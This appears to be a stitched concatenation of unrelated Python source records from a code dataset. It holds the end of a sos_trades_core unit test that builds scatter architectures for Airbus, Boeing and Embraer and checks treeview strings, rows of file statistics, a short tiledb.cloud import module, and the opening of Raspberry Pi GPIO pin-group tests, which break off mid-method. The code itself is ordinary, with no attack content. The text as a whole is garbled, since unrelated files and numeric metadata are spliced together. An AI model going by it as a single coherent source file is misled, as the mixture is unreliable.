f'\t\t\t|_ Services',
f'\t\t\t\t|_ OSS',
f'\t\t\t\t\t|_ NSA-300',
f'\t\t\t\t\t\t|_ Airframe',
f'\t\t\t\t\t\t|_ Propulsion',
f'\t\t\t\t\t|_ NSA-400',
f'\t\t\t\t\t\t|_ Airframe',
f'\t\t\t\t\t\t|_ Propulsion',
f'\t\t\t\t|_ FHS',
f'\t\t\t\t\t|_ NSA-300',
f'\t\t\t\t\t\t|_ Airframe',
f'\t\t\t\t\t\t|_ Propulsion',
f'\t\t\t\t\t|_ NSA-400',
f'\t\t\t\t\t\t|_ Airframe',
f'\t\t\t\t\t\t|_ Propulsion',
f'\t\t\t\t|_ Pool',
f'\t\t\t\t\t|_ NSA-300',
f'\t\t\t\t\t\t|_ Airframe',
f'\t\t\t\t\t\t|_ Propulsion',
f'\t\t\t\t\t|_ NSA-400',
f'\t\t\t\t\t\t|_ Airframe',
f'\t\t\t\t\t\t|_ Propulsion',
f'\t\t\t\t|_ TSP',
f'\t\t\t\t\t|_ NSA-300',
f'\t\t\t\t\t\t|_ Airframe',
f'\t\t\t\t\t\t|_ Propulsion',
f'\t\t\t\t\t|_ NSA-400',
f'\t\t\t\t\t\t|_ Airframe',
f'\t\t\t\t\t\t|_ Propulsion',
f'\t\t\t|_ Sales',
f'\t\t\t\t|_ NSA-300',
f'\t\t\t\t\t|_ Airframe',
f'\t\t\t\t\t|_ Propulsion',
f'\t\t\t\t|_ NSA-400',
f'\t\t\t\t\t|_ Airframe',
f'\t\t\t\t\t|_ Propulsion']
exp_tv_str = '\n'.join(exp_tv_list)
print(self.exec_eng.display_treeview_nodes())
assert exp_tv_str == self.exec_eng.display_treeview_nodes()
def _test_12_build_scatter_of_sub_architecture_and_scatter(self):
"""
This test aims at proving the ability to build a scatter of architecture and sub architecture.
we build a complex sub architecture of architecture under a scatter of actors
The test also proves the ability of the scatter to clean the architecture of sub architecture afterward
"""
mydict = {'input_name': 'actors_list',
'input_type': 'string_list',
'input_ns': 'ns_actors',
'output_name': 'ac_name',
'scatter_ns': 'ns_ac'} # or object ScatterMapBuild
# >> introduce ScatterMap
dict_sub = {'input_name': 'aircrafts_list',
'input_type': 'string_list',
'input_ns': 'ns_aircrafts',
'output_name': 'ac_name',
'scatter_ns': 'ns_ac'}
self.exec_eng.smaps_manager.add_build_map('actors_list', mydict)
self.exec_eng.smaps_manager.add_build_map('aircrafts_list', dict_sub)
self.exec_eng.ns_manager.add_ns('ns_actors', 'MyCase')
self.exec_eng.ns_manager.add_ns('ns_aircrafts', 'MyCase')
vb_builder_name = 'Business'
sub_architecture_df = pd.DataFrame(
{'Parent': ['Services', 'Services', 'Flight Hour', 'Maintenance'],
'Current': ['Flight Hour', 'Maintenance', 'FHS', 'OSS'],
'Type': ['SumValueBlockDiscipline', 'SumValueBlockDiscipline', 'ValueBlockDiscipline',
'ValueBlockDiscipline'],
'Action': [('standard'), ('standard'), ('scatter', 'aircrafts_list', 'ValueBlockDiscipline'),
('standard')],
'Activation': [False, False, False, False], })
architecture_df = pd.DataFrame(
{'Parent': ['Business', 'Business', 'First_Node', 'Second_Node'],
'Current': ['First_Node', 'Second_Node', 'Services', 'AC_Sales'],
'Type': ['SumValueBlockDiscipline', 'SumValueBlockDiscipline', 'ValueBlockDiscipline',
'ValueBlockDiscipline'],
'Action': [('standard'), ('standard'), ('architecture', sub_architecture_df), ('standard')],
'Activation': [True, True, False, False], })
builder = self.factory.create_architecture_builder(
vb_builder_name, architecture_df)
scatter = self.exec_eng.factory.create_scatter_builder('Scatter',
'actors_list', [builder])
self.exec_eng.factory.set_builders_to_coupling_builder(scatter)
self.exec_eng.ns_manager.add_ns_def({'ns_vbdict': self.study_name,
'ns_public': self.study_name,
'ns_segment_services': self.study_name,
'ns_services': self.study_name,
'ns_services_ac': self.study_name,
'ns_seg': self.study_name,
'ns_ac': self.study_name,
'ns_coc': self.study_name,
'ns_data_ac': self.study_name,
'ns_business_ac': self.study_name,
'ns_rc': self.study_name,
'ns_market': self.study_name,
'ns_market_in': self.study_name,
'ns_business': f'{self.study_name}.Business',
'ns_Airbus': f'{self.study_name}.Business.Airbus',
'ns_Boeing': f'{self.study_name}.Business.Boeing'})
self.exec_eng.configure()
dict_values = {self.study_name +
'.actors_list': ['Airbus', 'Boeing']}
self.exec_eng.load_study_from_input_dict(dict_values)
dict_values = {self.study_name +
'.aircrafts_list': ['AC1', 'AC2', 'AC3']}
self.exec_eng.load_study_from_input_dict(dict_values)
print("with Boeing and Airbus as actors")
initial_tree_view = [f'Nodes representation for Treeview {self.namespace}',
f'|_ {self.namespace}',
'\t|_ Scatter',
'\t\t|_ Airbus',
'\t\t\t|_ Business',
'\t\t\t\t|_ First_Node',
'\t\t\t\t\t|_ Services',
'\t\t\t\t\t\t|_ Flight Hour',
'\t\t\t\t\t\t\t|_ FHS',
'\t\t\t\t\t\t|_ Maintenance',
'\t\t\t\t\t\t\t|_ OSS',
'\t\t\t\t|_ Second_Node',
'\t\t\t\t\t|_ AC_Sales',
'\t\t|_ Boeing',
'\t\t\t|_ Business',
'\t\t\t\t|_ First_Node',
'\t\t\t\t\t|_ Services',
'\t\t\t\t\t\t|_ Flight Hour',
'\t\t\t\t\t\t\t|_ FHS',
'\t\t\t\t\t\t|_ Maintenance',
'\t\t\t\t\t\t\t|_ OSS',
'\t\t\t\t|_ Second_Node',
'\t\t\t\t\t|_ AC_Sales',
]
initial_tree_view = '\n'.join(initial_tree_view)
# self.assertEqual(initial_tree_view,self.exec_eng.display_treeview_nodes())
print(self.exec_eng.display_treeview_nodes())
dict_values = {self.study_name +
'.actors_list': ['Airbus', 'Embraer']}
self.exec_eng.load_study_from_input_dict(dict_values)
print("Deleting Boeing and inserting Embraer")
second_tree_view = [f'Nodes representation for Treeview {self.namespace}',
f'|_ {self.namespace}',
'\t|_ Scatter',
'\t\t|_ Airbus',
'\t\t\t|_ Business',
'\t\t\t\t|_ First_Node',
'\t\t\t\t\t|_ Services',
'\t\t\t\t\t\t|_ Flight Hour',
'\t\t\t\t\t\t\t|_ FHS',
'\t\t\t\t\t\t|_ Maintenance',
'\t\t\t\t\t\t\t|_ OSS',
'\t\t\t\t|_ Second_Node',
'\t\t\t\t\t|_ AC_Sales',
'\t\t|_ Embraer',
'\t\t\t|_ Business',
'\t\t\t\t|_ First_Node',
'\t\t\t\t\t|_ Services',
'\t\t\t\t\t\t|_ Flight Hour',
'\t\t\t\t\t\t\t|_ FHS',
'\t\t\t\t\t\t|_ Maintenance',
'\t\t\t\t\t\t\t|_ OSS',
'\t\t\t\t|_ Second_Node',
'\t\t\t\t\t|_ AC_Sales',
]
second_tree_view = '\n'.join(second_tree_view)
# self.assertEqual(second_tree_view, self.exec_eng.display_treeview_nodes())
print(self.exec_eng.display_treeview_nodes())
def test_13_build_scatter_of_architecture_without_father_and_with_sum_value_block(self):
"""
This test aims at proving the ability to build a value block at the actor node of a scatter of architecture.
For that purpose, we introduce a root_node in current nodes of architecture_df
"""
mydict = {'input_name': 'actors_list',
'input_type': 'string_list',
'input_ns': 'ns_actors',
'output_name': 'ac_name',
'scatter_ns': 'ns_ac'} # or object ScatterMapBuild
# >> introduce ScatterMap
self.exec_eng.smaps_manager.add_build_map('actors_list', mydict)
self.exec_eng.ns_manager.add_ns('ns_actors', 'MyCase')
architecture_name = 'Business'
architecture_df = pd.DataFrame(
{'Parent': ['Flight Hour', 'Maintenance', None, None, None],
'Current': ['FHS', 'OSS', 'Flight Hour', 'Maintenance', '@root_node@'],
'Type': ['SumValueBlockDiscipline', 'SumValueBlockDiscipline', 'FakeValueBlockDiscipline',
'FakeValueBlockDiscipline', 'SumValueBlockDiscipline'],
'Action': [('standard'), ('standard'), ('standard'), ('standard'), ('standard')],
'Activation': [False, False, True, True, False], })
builder = self.factory.create_architecture_builder(
architecture_name, architecture_df)
scatter = self.exec_eng.factory.create_scatter_builder('Business',
'actors_list', builder)
self.exec_eng.factory.set_builders_to_coupling_builder(scatter)
self.exec_eng.ns_manager.add_ns_def({'ns_vbdict': self.study_name,
'ns_public': self.study_name,
'ns_segment_services': self.study_name,
'ns_services': self.study_name,
'ns_services_ac': self.study_name,
'ns_seg': self.study_name,
'ns_ac': self.study_name,
'ns_coc': self.study_name,
'ns_data_ac': self.study_name,
'ns_business_ac': self.study_name,
'ns_rc': self.study_name,
'ns_market': self.study_name,
'ns_market_in': self.study_name,
'ns_business': f'{self.study_name}.Business',
'ns_Airbus': f'{self.study_name}.Business.Airbus',
'ns_Boeing': f'{self.study_name}.Business.Boeing'})
self.exec_eng.configure()
dict_values = {self.study_name +
'.actors_list': ['Airbus', 'Boeing']}
self.exec_eng.load_study_from_input_dict(dict_values)
print("with Boeing and Airbus as actors")
print(self.exec_eng.display_treeview_nodes())
tree_view = [f'Nodes representation for Treeview {self.namespace}',
f'|_ {self.namespace}',
f'\t|_ Business',
'\t\t|_ Airbus',
'\t\t\t|_ Flight Hour',
'\t\t\t\t|_ FHS',
'\t\t\t|_ Maintenance',
'\t\t\t\t|_ OSS',
'\t\t|_ Boeing',
'\t\t\t|_ Flight Hour',
'\t\t\t\t|_ FHS',
'\t\t\t|_ Maintenance',
'\t\t\t\t|_ OSS']
tree_view = '\n'.join(tree_view)
self.assertEqual(tree_view,
self.exec_eng.display_treeview_nodes())
self.exec_eng.execute()
output_flight_hour_airbus = self.exec_eng.dm.get_value(
'MyCase.Business.Airbus.Flight Hour.output')
output_flight_hour_boeing = self.exec_eng.dm.get_value(
'MyCase.Business.Boeing.Flight Hour.output')
output_maintenance_airbus = self.exec_eng.dm.get_value(
'MyCase.Business.Airbus.Maintenance.output')
output_maintenance_boeing = self.exec_eng.dm.get_value(
'MyCase.Business.Boeing.Maintenance.output')
output_airbus_gather = self.exec_eng.dm.get_value(
'MyCase.Business.Airbus.output_gather')
output_boeing_gather = self.exec_eng.dm.get_value(
'MyCase.Business.Boeing.output_gather')
self.assertDictEqual(output_airbus_gather, {'Flight Hour': output_flight_hour_airbus,
'Maintenance': output_maintenance_airbus})
self.assertDictEqual(output_boeing_gather, {'Flight Hour': output_flight_hour_boeing,
'Maintenance': output_maintenance_boeing})
dict_values = {self.study_name +
'.actors_list': ['Airbus', 'Embraer']}
self.exec_eng.load_study_from_input_dict(dict_values)
print("Deleting Boeing and inserting Embraer")
tree_view = [f'Nodes representation for Treeview {self.namespace}',
f'|_ {self.namespace}',
f'\t|_ Business',
'\t\t|_ Airbus',
'\t\t\t|_ Flight Hour',
'\t\t\t\t|_ FHS',
'\t\t\t|_ Maintenance',
'\t\t\t\t|_ OSS',
'\t\t|_ Embraer',
'\t\t\t|_ Flight Hour',
'\t\t\t\t|_ FHS',
'\t\t\t|_ Maintenance',
'\t\t\t\t|_ OSS']
tree_view = '\n'.join(tree_view)
self.assertEqual(tree_view,
self.exec_eng.display_treeview_nodes())
self.exec_eng.execute()
output_flight_hour_airbus = self.exec_eng.dm.get_value(
'MyCase.Business.Airbus.Flight Hour.output')
output_flight_hour_embraer = self.exec_eng.dm.get_value(
'MyCase.Business.Embraer.Flight Hour.output')
output_maintenance_airbus = self.exec_eng.dm.get_value(
'MyCase.Business.Airbus.Maintenance.output')
output_maintenance_embraer = self.exec_eng.dm.get_value(
'MyCase.Business.Embraer.Maintenance.output')
output_airbus_gather = self.exec_eng.dm.get_value(
'MyCase.Business.Airbus.output_gather')
output_embraer_gather = self.exec_eng.dm.get_value(
'MyCase.Business.Embraer.output_gather')
self.assertDictEqual(output_airbus_gather, {'Flight Hour': output_flight_hour_airbus,
'Maintenance': output_maintenance_airbus})
self.assertDictEqual(output_embraer_gather, {'Flight Hour': output_flight_hour_embraer,
'Maintenance': output_maintenance_embraer})
def test_14_build_scatter_of_sub_architecture_with_process_with_root_node(self):
"""
In this test, we reproduce the APDS process with a root_node.
Since the children_dict is not yet well configured, we just test that
we are able to reproduce the tree view node and that Core sum value Blocks
are built at the actor node.
"""
builder_process = self.exec_eng.factory.get_builder_from_process(
'sos_trades_core.sos_processes.test', 'test_scatter_architecture_with_root')
self.exec_eng.factory.set_builders_to_coupling_builder(builder_process)
self.exec_eng.load_study_from_input_dict({})
activ_df = pd.DataFrame({'AC_list': ['NSA-300', 'NSA-300', 'NSA-400', 'NSA-400'],
'subsystem_list': ['Airframe', 'Propulsion', 'Airframe', 'Propulsion'],
'OSS': [True, True, True, True],
'FHS': [True, True, True, True],
'Pool': [True, True, True, True],
'TSP': [True, True, True, True],
'Sales': [True, True, True, True]
})
dict_values = {
f'{self.study_name}.Business.actors_list': ['Airbus', 'Boeing'],
f'{self.study_name}.Business.Airbus.activation_df': activ_df,
f'{self.study_name}.Business.Boeing.activation_df': activ_df}
self.exec_eng.load_study_from_input_dict(dict_values)
print("with Boeing and Airbus as actors")
tree_view = [f'Nodes representation for Treeview {self.namespace}',
f'|_ {self.namespace}',
f'\t|_ Business',
f'\t\t|_ Airbus',
f'\t\t\t|_ Services',
f'\t\t\t\t|_ OSS',
f'\t\t\t\t\t|_ NSA-300',
f'\t\t\t\t\t\t|_ Airframe',
f'\t\t\t\t\t\t|_ Propulsion',
f'\t\t\t\t\t|_ NSA-400',
f'\t\t\t\t\t\t|_ Airframe',
f'\t\t\t\t\t\t|_ Propulsion',
f'\t\t\t\t|_ FHS',
f'\t\t\t\t\t|_ NSA-300',
f'\t\t\t\t\t\t|_ Airframe',
f'\t\t\t\t\t\t|_ Propulsion',
f'\t\t\t\t\t|_ NSA-400',
f'\t\t\t\t\t\t|_ Airframe',
f'\t\t\t\t\t\t|_ Propulsion',
f'\t\t\t\t|_ Pool',
f'\t\t\t\t\t|_ NSA-300',
f'\t\t\t\t\t\t|_ Airframe',
f'\t\t\t\t\t\t|_ Propulsion',
f'\t\t\t\t\t|_ NSA-400',
f'\t\t\t\t\t\t|_ Airframe',
f'\t\t\t\t\t\t|_ Propulsion',
f'\t\t\t\t|_ TSP',
f'\t\t\t\t\t|_ NSA-300',
f'\t\t\t\t\t\t|_ Airframe',
f'\t\t\t\t\t\t|_ Propulsion',
f'\t\t\t\t\t|_ NSA-400',
f'\t\t\t\t\t\t|_ Airframe',
f'\t\t\t\t\t\t|_ Propulsion',
f'\t\t\t|_ Sales',
f'\t\t\t\t|_ NSA-300',
f'\t\t\t\t\t|_ Airframe',
f'\t\t\t\t\t|_ Propulsion',
f'\t\t\t\t|_ NSA-400',
f'\t\t\t\t\t|_ Airframe',
f'\t\t\t\t\t|_ Propulsion',
f'\t\t|_ Boeing',
f'\t\t\t|_ Services',
f'\t\t\t\t|_ OSS',
f'\t\t\t\t\t|_ NSA-300',
f'\t\t\t\t\t\t|_ Airframe',
f'\t\t\t\t\t\t|_ Propulsion',
f'\t\t\t\t\t|_ NSA-400',
f'\t\t\t\t\t\t|_ Airframe',
f'\t\t\t\t\t\t|_ Propulsion',
f'\t\t\t\t|_ FHS',
f'\t\t\t\t\t|_ NSA-300',
f'\t\t\t\t\t\t|_ Airframe',
f'\t\t\t\t\t\t|_ Propulsion',
f'\t\t\t\t\t|_ NSA-400',
f'\t\t\t\t\t\t|_ Airframe',
f'\t\t\t\t\t\t|_ Propulsion',
f'\t\t\t\t|_ Pool',
f'\t\t\t\t\t|_ NSA-300',
f'\t\t\t\t\t\t|_ Airframe',
f'\t\t\t\t\t\t|_ Propulsion',
f'\t\t\t\t\t|_ NSA-400',
f'\t\t\t\t\t\t|_ Airframe',
f'\t\t\t\t\t\t|_ Propulsion',
f'\t\t\t\t|_ TSP',
f'\t\t\t\t\t|_ NSA-300',
f'\t\t\t\t\t\t|_ Airframe',
f'\t\t\t\t\t\t|_ Propulsion',
f'\t\t\t\t\t|_ NSA-400',
f'\t\t\t\t\t\t|_ Airframe',
f'\t\t\t\t\t\t|_ Propulsion',
f'\t\t\t|_ Sales',
f'\t\t\t\t|_ NSA-300',
f'\t\t\t\t\t|_ Airframe',
f'\t\t\t\t\t|_ Propulsion',
f'\t\t\t\t|_ NSA-400',
f'\t\t\t\t\t|_ Airframe',
f'\t\t\t\t\t|_ Propulsion']
tree_view = '\n'.join(tree_view)
self.assertTrue(
isinstance(self.exec_eng.dm.get_disciplines_with_name('MyCase.Business.Airbus')[1], ValueBlockDiscipline))
self.assertTrue(
isinstance(self.exec_eng.dm.get_disciplines_with_name('MyCase.Business.Boeing')[1], ValueBlockDiscipline))
assert tree_view == self.exec_eng.display_treeview_nodes()
dict_values = {self.study_name +
'.Business.actors_list': ['Airbus', 'Embraer'],
f'{self.study_name}.Business.Airbus.activation_df': activ_df,
f'{self.study_name}.Business.Embraer.activation_df': activ_df
}
self.exec_eng.load_study_from_input_dict(dict_values)
print("Deleting Boeing and inserting Embraer")
tree_view = [f'Nodes representation for Treeview {self.namespace}',
f'|_ {self.namespace}',
f'\t|_ Business',
f'\t\t|_ Airbus',
f'\t\t\t|_ Services',
f'\t\t\t\t|_ OSS',
f'\t\t\t\t\t|_ NSA-300',
f'\t\t\t\t\t\t|_ Airframe',
f'\t\t\t\t\t\t|_ Propulsion',
f'\t\t\t\t\t|_ NSA-400',
f'\t\t\t\t\t\t|_ Airframe',
f'\t\t\t\t\t\t|_ Propulsion',
f'\t\t\t\t|_ FHS',
f'\t\t\t\t\t|_ NSA-300',
f'\t\t\t\t\t\t|_ Airframe',
f'\t\t\t\t\t\t|_ Propulsion',
f'\t\t\t\t\t|_ NSA-400',
f'\t\t\t\t\t\t|_ Airframe',
f'\t\t\t\t\t\t|_ Propulsion',
f'\t\t\t\t|_ Pool',
f'\t\t\t\t\t|_ NSA-300',
f'\t\t\t\t\t\t|_ Airframe',
f'\t\t\t\t\t\t|_ Propulsion',
f'\t\t\t\t\t|_ NSA-400',
f'\t\t\t\t\t\t|_ Airframe',
f'\t\t\t\t\t\t|_ Propulsion',
f'\t\t\t\t|_ TSP',
f'\t\t\t\t\t|_ NSA-300',
f'\t\t\t\t\t\t|_ Airframe',
f'\t\t\t\t\t\t|_ Propulsion',
f'\t\t\t\t\t|_ NSA-400',
f'\t\t\t\t\t\t|_ Airframe',
f'\t\t\t\t\t\t|_ Propulsion',
f'\t\t\t|_ Sales',
f'\t\t\t\t|_ NSA-300',
f'\t\t\t\t\t|_ Airframe',
f'\t\t\t\t\t|_ Propulsion',
f'\t\t\t\t|_ NSA-400',
f'\t\t\t\t\t|_ Airframe',
f'\t\t\t\t\t|_ Propulsion',
f'\t\t|_ Embraer',
f'\t\t\t|_ Services',
f'\t\t\t\t|_ OSS',
f'\t\t\t\t\t|_ NSA-300',
f'\t\t\t\t\t\t|_ Airframe',
f'\t\t\t\t\t\t|_ Propulsion',
f'\t\t\t\t\t|_ NSA-400',
f'\t\t\t\t\t\t|_ Airframe',
f'\t\t\t\t\t\t|_ Propulsion',
f'\t\t\t\t|_ FHS',
f'\t\t\t\t\t|_ NSA-300',
f'\t\t\t\t\t\t|_ Airframe',
f'\t\t\t\t\t\t|_ Propulsion',
f'\t\t\t\t\t|_ NSA-400',
f'\t\t\t\t\t\t|_ Airframe',
f'\t\t\t\t\t\t|_ Propulsion',
f'\t\t\t\t|_ Pool',
f'\t\t\t\t\t|_ NSA-300',
f'\t\t\t\t\t\t|_ Airframe',
f'\t\t\t\t\t\t|_ Propulsion',
f'\t\t\t\t\t|_ NSA-400',
f'\t\t\t\t\t\t|_ Airframe',
f'\t\t\t\t\t\t|_ Propulsion',
f'\t\t\t\t|_ TSP',
f'\t\t\t\t\t|_ NSA-300',
f'\t\t\t\t\t\t|_ Airframe',
f'\t\t\t\t\t\t|_ Propulsion',
f'\t\t\t\t\t|_ NSA-400',
f'\t\t\t\t\t\t|_ Airframe',
f'\t\t\t\t\t\t|_ Propulsion',
f'\t\t\t|_ Sales',
f'\t\t\t\t|_ NSA-300',
f'\t\t\t\t\t|_ Airframe',
f'\t\t\t\t\t|_ Propulsion',
f'\t\t\t\t|_ NSA-400',
f'\t\t\t\t\t|_ Airframe',
f'\t\t\t\t\t|_ Propulsion']
tree_view = '\n'.join(tree_view)
assert tree_view == self.exec_eng.display_treeview_nodes()
self.assertTrue(
isinstance(self.exec_eng.dm.get_disciplines_with_name('MyCase.Business.Embraer')[1], ValueBlockDiscipline))
print(" deactivating sales in embraer")
embraer_activ_df = pd.DataFrame({'AC_list': ['NSA-300', 'NSA-300', 'NSA-400', 'NSA-400'],
'subsystem_list': ['Airframe', 'Propulsion', 'Airframe', 'Propulsion'],
'OSS': [True, True, True, True],
'FHS': [True, True, True, True],
'Pool': [True, True, True, True],
'TSP': [True, True, True, True],
'Sales': [False, False, False, False]
})
dict_values = {
f'{self.study_name}.Business.Embraer.activation_df': embraer_activ_df}
self.exec_eng.load_study_from_input_dict(dict_values)
print(self.exec_eng.display_treeview_nodes())
tree_view = [f'Nodes representation for Treeview {self.namespace}',
f'|_ {self.namespace}',
f'\t|_ Business',
f'\t\t|_ Airbus',
f'\t\t\t|_ Services',
f'\t\t\t\t|_ OSS',
f'\t\t\t\t\t|_ NSA-300',
f'\t\t\t\t\t\t|_ Airframe',
f'\t\t\t\t\t\t|_ Propulsion',
f'\t\t\t\t\t|_ NSA-400',
f'\t\t\t\t\t\t|_ Airframe',
f'\t\t\t\t\t\t|_ Propulsion',
f'\t\t\t\t|_ FHS',
f'\t\t\t\t\t|_ NSA-300',
f'\t\t\t\t\t\t|_ Airframe',
f'\t\t\t\t\t\t|_ Propulsion',
f'\t\t\t\t\t|_ NSA-400',
f'\t\t\t\t\t\t|_ Airframe',
f'\t\t\t\t\t\t|_ Propulsion',
f'\t\t\t\t|_ Pool',
f'\t\t\t\t\t|_ NSA-300',
f'\t\t\t\t\t\t|_ Airframe',
f'\t\t\t\t\t\t|_ Propulsion',
f'\t\t\t\t\t|_ NSA-400',
f'\t\t\t\t\t\t|_ Airframe',
f'\t\t\t\t\t\t|_ Propulsion',
f'\t\t\t\t|_ TSP',
f'\t\t\t\t\t|_ NSA-300',
f'\t\t\t\t\t\t|_ Airframe',
f'\t\t\t\t\t\t|_ Propulsion',
f'\t\t\t\t\t|_ NSA-400',
f'\t\t\t\t\t\t|_ Airframe',
f'\t\t\t\t\t\t|_ Propulsion',
f'\t\t\t|_ Sales',
f'\t\t\t\t|_ NSA-300',
f'\t\t\t\t\t|_ Airframe',
f'\t\t\t\t\t|_ Propulsion',
f'\t\t\t\t|_ NSA-400',
f'\t\t\t\t\t|_ Airframe',
f'\t\t\t\t\t|_ Propulsion',
f'\t\t|_ Embraer',
f'\t\t\t|_ Services',
f'\t\t\t\t|_ OSS',
f'\t\t\t\t\t|_ NSA-300',
f'\t\t\t\t\t\t|_ Airframe',
f'\t\t\t\t\t\t|_ Propulsion',
f'\t\t\t\t\t|_ NSA-400',
f'\t\t\t\t\t\t|_ Airframe',
f'\t\t\t\t\t\t|_ Propulsion',
f'\t\t\t\t|_ FHS',
f'\t\t\t\t\t|_ NSA-300',
f'\t\t\t\t\t\t|_ Airframe',
f'\t\t\t\t\t\t|_ Propulsion',
f'\t\t\t\t\t|_ NSA-400',
f'\t\t\t\t\t\t|_ Airframe',
f'\t\t\t\t\t\t|_ Propulsion',
f'\t\t\t\t|_ Pool',
f'\t\t\t\t\t|_ NSA-300',
f'\t\t\t\t\t\t|_ Airframe',
f'\t\t\t\t\t\t|_ Propulsion',
f'\t\t\t\t\t|_ NSA-400',
f'\t\t\t\t\t\t|_ Airframe',
f'\t\t\t\t\t\t|_ Propulsion',
f'\t\t\t\t|_ TSP',
f'\t\t\t\t\t|_ NSA-300',
f'\t\t\t\t\t\t|_ Airframe',
f'\t\t\t\t\t\t|_ Propulsion',
f'\t\t\t\t\t|_ NSA-400',
f'\t\t\t\t\t\t|_ Airframe',
f'\t\t\t\t\t\t|_ Propulsion']
tree_view = '\n'.join(tree_view)
assert tree_view == self.exec_eng.display_treeview_nodes()
# The value Block at node Embraer doesn't have children anymore
assert (self.exec_eng.dm.get_disciplines_with_name('MyCase.Business.Embraer')[1]).children_list == []
| 51.046448
| 119
| 0.448782
| 10,354
| 93,415
| 3.787811
| 0.029747
| 0.121982
| 0.134017
| 0.118004
| 0.915398
| 0.908463
| 0.89704
| 0.889467
| 0.877687
| 0.866697
| 0
| 0.009239
| 0.416057
| 93,415
| 1,829
| 120
| 51.074358
| 0.709729
| 0.032008
| 0
| 0.894103
| 0
| 0
| 0.309846
| 0.049471
| 0
| 0
| 0
| 0
| 0.029803
| 1
| 0.009512
| false
| 0
| 0.003805
| 0
| 0.013951
| 0.017121
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8e6ed55d2a250e214a22a87b1299373cd6c466c0
| 194
|
py
|
Python
|
tiledb/cloud/compute/__init__.py
|
TileDB-Inc/TileDB-Cloud-Py
|
e73f6e0ae3fc595218abd3be606c68f62ad5ac9b
|
[
"MIT"
] | 4
|
2019-12-04T23:19:35.000Z
|
2021-06-21T21:42:53.000Z
|
tiledb/cloud/compute/__init__.py
|
TileDB-Inc/TileDB-Cloud-Py
|
e73f6e0ae3fc595218abd3be606c68f62ad5ac9b
|
[
"MIT"
] | 106
|
2019-11-07T22:40:43.000Z
|
2022-03-29T22:31:18.000Z
|
tiledb/cloud/compute/__init__.py
|
TileDB-Inc/TileDB-Cloud-Py
|
e73f6e0ae3fc595218abd3be606c68f62ad5ac9b
|
[
"MIT"
] | 1
|
2020-10-04T18:54:37.000Z
|
2020-10-04T18:54:37.000Z
|
from tiledb.cloud.compute.delayed import Delayed
from tiledb.cloud.compute.delayed import DelayedArrayUDF
from tiledb.cloud.compute.delayed import DelayedSQL
from tiledb.cloud.dag import Status
| 38.8
| 56
| 0.860825
| 27
| 194
| 6.185185
| 0.37037
| 0.239521
| 0.359281
| 0.39521
| 0.628743
| 0.628743
| 0
| 0
| 0
| 0
| 0
| 0
| 0.082474
| 194
| 4
| 57
| 48.5
| 0.938202
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
8eb492ce87fbfbfa180a1591cf3abefc4581088c
| 37,697
|
py
|
Python
|
dibase/rpi/gpio/test/pingroup-platformtests.py
|
ralph-mcardell/dibase-rpi-python
|
724c18d1f3c6745b3dddf582ea2272ed4e2df8ac
|
[
"BSD-3-Clause"
] | null | null | null |
dibase/rpi/gpio/test/pingroup-platformtests.py
|
ralph-mcardell/dibase-rpi-python
|
724c18d1f3c6745b3dddf582ea2272ed4e2df8ac
|
[
"BSD-3-Clause"
] | null | null | null |
dibase/rpi/gpio/test/pingroup-platformtests.py
|
ralph-mcardell/dibase-rpi-python
|
724c18d1f3c6745b3dddf582ea2272ed4e2df8ac
|
[
"BSD-3-Clause"
] | null | null | null |
'''
Part of the dibase.rpi.gpio.test package.
Platform tests on read/write operations on GPIO pin group
IO type instances.
Developed by R.E. McArdell / Dibase Limited.
Copyright (c) 2012 Dibase Limited
License: dual: GPL or BSD.
'''
import collections
import time
import unittest
import sys
if __name__ == '__main__':
# Add path to directory containing the dibase package directory
sys.path.insert(0, './../../../..')
from dibase.rpi.gpio import pingroup
from dibase.rpi.gpio.pin import force_free_pin
from dibase.rpi.gpio.pinid import RPiPinIdSet
from dibase.rpi.gpio import gpioerror as error
class OpenPinGroupFunctionPlatformTests(unittest.TestCase):
def tearDown(self):
cleaned_up = []
for v in RPiPinIdSet.valid_ids(pingroup.PinId._get_rpi_major_revision_index()):
id = force_free_pin(pingroup.PinId.gpio(v))
if (id!=None):
cleaned_up.append(id)
if ( cleaned_up != [] ):
print "\nCleaned up left over exports for pins", cleaned_up
self.assertEqual(cleaned_up,[])
def test_open_pins_for_writing_bad_blocking_mode_fails(self):
with self.assertRaises( error.PinBlockModeInvalidError ):
pingroup.open_pingroup([pingroup.PinId.p1_gpio_gen0()],'w#I')
def test_open_pins_for_writing_bad_format_mode_fails(self):
with self.assertRaises( error.PinGroupFormatModeInvalidError ):
pingroup.open_pingroup([pingroup.PinId.p1_gpio_gen0()],'wN#')
def test_open_pins_for_writing_bad_blocking_or_format_mode_fails(self):
with self.assertRaises( error.PinGroupOpenModeInvalidError ):
pingroup.open_pingroup([pingroup.PinId.p1_gpio_gen0()],'w#')
def test_open_pin_for_writing_creates_PinWordWriter(self):
self.assertIsInstance(pingroup.open_pingroup([pingroup.PinId.p1_gpio_gen0()],'w'),pingroup.PinWordWriter)
def test_open_pin_for_writing_nonblocking_mode_creates_PinWordWriter(self):
self.assertIsInstance(pingroup.open_pingroup([pingroup.PinId.p1_gpio_gen0()],'wN'),pingroup.PinWordWriter)
def test_open_pin_for_writing_integer_mode_creates_PinWordWriter(self):
self.assertIsInstance(pingroup.open_pingroup([pingroup.PinId.p1_gpio_gen0()],'wI'),pingroup.PinWordWriter)
def test_open_pin_for_writing_noblocking_integer_mode_creates_PinWordWriter(self):
self.assertIsInstance(pingroup.open_pingroup([pingroup.PinId.p1_gpio_gen0()],'wNI'),pingroup.PinWordWriter)
def test_open_pin_for_writing_sequence_mode_creates_PinListWriter(self):
self.assertIsInstance(pingroup.open_pingroup([pingroup.PinId.p1_gpio_gen0()],'wS'),pingroup.PinListWriter)
def test_open_pin_for_writing_nonblocking_sequence_mode_creates_PinListWriter(self):
